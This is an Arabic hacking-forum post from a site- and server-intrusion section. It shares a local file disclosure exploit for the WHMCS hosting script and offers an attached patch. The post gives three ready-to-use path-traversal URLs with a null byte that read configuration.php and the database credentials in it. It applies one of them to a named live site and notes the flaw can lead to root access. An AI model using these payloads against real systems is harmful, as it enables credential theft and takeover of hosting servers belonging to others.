يمنع منعاً باتاً رفع الملفات على المواقع التالية:
Ge.tt - mediafire.com - 4shared.com
مطلوب طاقم إشراف وأدارة للمنتدى, للمعنيين بالرجاء التواصل مع الادارة على البريد التالي :
vbspiders.network@gmail.com


العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات
تحديث الصفحة ثغره بسكربت الاستضافه WHMCompleteSolution Local File Disclosure مع الترقيع
التسجيل التعليمات التقويم مشاركات اليوم البحث

 
 
أدوات الموضوع انواع عرض الموضوع
السابق المشاركة السابقة   المشاركة التالية التالي
قديم 10-23-2011, 10:34 AM   رقم المشاركة : 1
معلومات العضو
KaLa$nikoV
VBSPIDERS TEAM

#~VoLc4n0~#

 
الصورة الرمزية KaLa$nikoV
 

 
 
إحصائية العضو







KaLa$nikoV غير متواجد حالياً

إرسال رسالة عبر MSN إلى KaLa$nikoV

 

 

إحصائية الترشيح

عدد النقاط : 11
KaLa$nikoV is on a distinguished road
افتراضي ثغره بسكربت الاستضافه WHMCompleteSolution Local File Disclosure مع الترقيع

السلام عليكم ورحمه الله وبركاته


الثغره بسيطه ومنتشره من زمان بين الشباب ع الايميل


لكن في حد حب ينشرها لمواقع السكيورتي الله يهديه

(رح تترقع هيك الثغره )

خطوره الثغره كبيره لانك ممكن توصل للروت

الاستغلال

كود PHP:

cart.php?a=test&templatefile=../../../configuration.php%00
submitticket.php?step=test&templatefile=../../../configuration.php%00
downloads.php?action=test&templatefile=../../../configuration.php%00 
بتقرا الكونفج بالسورس كود للصفحه

مثال



كود PHP:

https://storm-servers.net/whmcs/cart.php?a=test&templatefile=../../../configuration.php%00 
افتح اللنك وبعد افتح السورس كود بتلقى بينات الكونفج

اتوقع الشرح مفهوم خاصه مع المثال

وترقيع الثغره بالمرفقات
ارفع المرفق بداخل سكربت whmcs

واستبدله بالملف الاصلي

بامان الله ورعايته
الملفات المرفقة
نوع الملف: rar dbconnect.rar‏ (16.8 كيلوبايت, المشاهدات 25)
:: نصائح مهمه :: - أفحص الملف المرفق بأي برنامج مضاد للفيروسات
2- قم بمراسلة المراقب عن أي مرفق يوجد به فيروس
3- المنتدى غير مسوؤل عن مايحتويه المرفق من بيانات
التوقيع



هل سأعود يوما
ام هي نهايه الطريق !!
إلهيْ ’ / أبدل عُسَرِنا يسُراً


لا تنسونا من دعائكم







سبحان الله والحمدلله ولا اله الا الله والله اكبر
fb.com/groups/VoLc4n0/
volc4n0@hotmail.com

 

التعديل الأخير تم بواسطة Cyber Code ; 11-09-2011 الساعة 01:41 AM.

   

رد مع اقتباس
 

مواقع النشر (المفضلة)

« الموضوع السابق | الموضوع التالي »

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك
BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
الانتقال السريع


الساعة الآن 03:07 AM

راسلـنا - :: vBspiders.Com :: - الأعلى

[ vBspiders.Com Network ]